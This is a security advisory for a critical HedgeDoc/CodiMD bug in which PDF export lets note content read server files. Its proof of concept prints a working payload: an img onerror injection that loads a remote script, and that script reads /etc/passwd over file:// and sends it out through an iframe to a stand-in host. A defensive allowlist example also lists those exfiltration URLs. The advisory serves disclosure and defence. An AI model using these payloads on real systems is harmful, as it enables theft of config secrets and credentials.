
PDF export allows arbitrary file reads

Critical
davidmehren published GHSA-pxxg-px9v-6qf3 Apr 25, 2021

Package

hedgedoc

Affected versions

<1.5.0

Patched versions

1.5.0

Description

Impact

An attacker is able to read arbitrary files from the server's file system when a note is exported to PDF. Because the code injection has to take place through note content, the exploit requires that the attacker is able to modify a note.

This affects all instances that have PDF export enabled.

Patches

--- a/lib/config/index.js
+++ b/lib/config/index.js
@@ -189,6 +189,12 @@ switch (config.imageUploadType) {
     ]
 }
 
+// Disable PDF export due to security issue
+if (config.allowPDFExport) {
+  config.allowPDFExport = false
+  logger.warn('PDF export was disabled for this release to mitigate a critical security issue. This feature will hopefully become available again in future releases.')
+}
+
 // generate correct path
 config.sslCAPath.forEach(function (capath, i, array) {
   array[i] = path.resolve(appRootPath, capath)
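Review bot: the override `if (config.allowPDFExport) { config.allowPDFExport = false ... }` is placed after the imageUploadType switch, so anything that reads config.allowPDFExport earlier in this file (not visible in the hunk) would still see the operator's value; confirm that the export route and the UI only consult the flag after this point. Since this hunk is a mitigation that disables the feature rather than a fix of the renderer's file:// access, the logger.warn message would be more useful if it named the advisory (GHSA-pxxg-px9v-6qf3) so operators can find the details, and the advisory's workaround (`CMD_ALLOW_PDF_EXPORT=false` or `"allowPDFExport": false`) becomes a no-op once this change is in place, which is worth stating in the warning.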

Fixed in c178947

Was fixed in 1.5.0

Workarounds

Start the CodiMD/HedgeDoc instance with CMD_ALLOW_PDF_EXPORT=false or set "allowPDFExport": false in config.json.

Proof of Concept

  1. Host a malicious JavaScript file on a server you control. For demonstration
     purposes the script uses the domain example.com. When it runs inside the
     PDF renderer, it reads /etc/passwd over file:// and leaks the contents,
     base64-encoded, in the URL of an iframe request back to that server:

    // Runs inside the PhantomJS page that renders the note to PDF.
    function reqListener () {
        // base64-encode the file contents so they survive being put in a URL
        var b64 = btoa(this.responseText);
        // The iframe request lands in the attacker's web server access log.
        document.write('<iframe src="http://example.com/exfil?data=' + b64 + '"></iframe>');
    }
    var oReq = new XMLHttpRequest();
    oReq.addEventListener("load", reqListener);
    // Local file read: the renderer allows file:// requests from note content.
    oReq.open("GET", "file:///etc/passwd");
    oReq.send();

  2. Create a new note in CodiMD/HedgeDoc whose content is an image tag with an
     error handler that pulls in that script:

    <img src="something_not_found" onerror="document.write('<script src=http://example.com/path_to_malicious_script.js></script>')"/>

  3. Use the export PDF function on that note.

  4. Read the exfiltrated data, base64-encoded, from your server's access log.

Further analysis

This works because, although PhantomJS does not render the content of file:///
references into the PDF itself, it still fetches them internally and executes
the note's JavaScript, so a script in the note can read local files and
exfiltrate them easily.

The impact is severe, as the attacker is able to read the CodiMD/HedgeDoc
config.json as well as any other file the renderer process can access. Even
though the suggested Docker deployment does not contain many interesting files
itself, config.json often holds sensitive information such as database
credentials and OAuth secrets.
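The analysis above points at the root cause: the renderer executes the note's JavaScript with access to the file:// scheme. Disabling the feature, as 1.5.0 does, is the safe choice; the following added example, which is not HedgeDoc's code and assumes a hypothetical headless renderer that exposes a per-request hook, shows the deny-by-default request policy such a renderer would need, and replays the PoC's request sequence through it. The instance hostname, the `simulateExport` helper and the request list are assumptions.

```javascript
// Added example (not HedgeDoc's code): a deny-by-default request policy for a
// headless PDF renderer, plus a replay of the PoC's request sequence against it.

// Decide whether the renderer may fetch `requestUrl` while exporting a note.
// `allowedHosts` holds the hosts the renderer legitimately needs (the instance
// itself and any configured image host); everything else is denied, including
// every non-http(s) scheme, so a file:// read cannot happen at all.
function renderRequestPolicy(requestUrl, { allowedHosts }) {
  let url;
  try {
    url = new URL(requestUrl); // WHATWG parser: normalises the scheme to lower case
  } catch (err) {
    return { allow: false, reason: 'unparseable URL' };
  }
  if (url.protocol === 'file:') {
    return { allow: false, reason: 'file: scheme is never allowed in the renderer' };
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    return { allow: false, reason: `scheme ${url.protocol} is not http(s)` };
  }
  if (!allowedHosts.has(url.hostname)) {
    return { allow: false, reason: `host ${url.hostname} is not allowlisted` };
  }
  return { allow: true, reason: 'http(s) request to an allowlisted host' };
}

// Replay the requests a page would issue and partition them. A real renderer
// would call the policy from its request hook and abort denied fetches (for
// example, the request-interception callback of a headless browser).
function simulateExport(requests, policy, options) {
  const allowed = [];
  const denied = [];
  for (const r of requests) {
    const verdict = policy(r.url, options);
    (verdict.allow ? allowed : denied).push({ ...r, reason: verdict.reason });
  }
  return { allowed, denied };
}

// The request sequence from the PoC, reconstructed as constructed sample data.
// The instance hostname (hedgedoc.example) is an assumption.
const POC_REQUESTS = [
  { step: 'legitimate image in the note', url: 'https://hedgedoc.example/uploads/diagram.png' },
  { step: 'onerror pulls the remote script', url: 'http://example.com/path_to_malicious_script.js' },
  { step: 'script reads a local file', url: 'file:///etc/passwd' },
  { step: 'script reads the instance config', url: 'file:///hedgedoc/config.json' },
  { step: 'iframe exfiltrates the data', url: 'http://example.com/exfil?data=cm9vdDp4OjA6MDpyb290' },
  { step: 'malformed URL', url: 'not a url' },
];

const EXPORT_OPTIONS = { allowedHosts: new Set(['hedgedoc.example']) };

function runPocAgainstPolicy() {
  return simulateExport(POC_REQUESTS, renderRequestPolicy, EXPORT_OPTIONS);
}

const result = runPocAgainstPolicy();
for (const r of result.denied) console.log(`DENY  ${r.step}: ${r.url} (${r.reason})`);
for (const r of result.allowed) console.log(`ALLOW ${r.step}: ${r.url}`);
```

Note that the allowlist stops the chain twice: the remote script never loads because example.com is not an allowed host, and even a script smuggled inline would find file:// blocked. A request policy only narrows the blast radius, though; disabling JavaScript in the renderer, or rendering from sanitized HTML that carries no scripts, removes the exfiltration channel altogether and is the stronger fix.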

For more information

If you have any questions or comments about this advisory:

Severity

Critical 10.0 / 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

CVE ID

CVE-2021-29475

Credits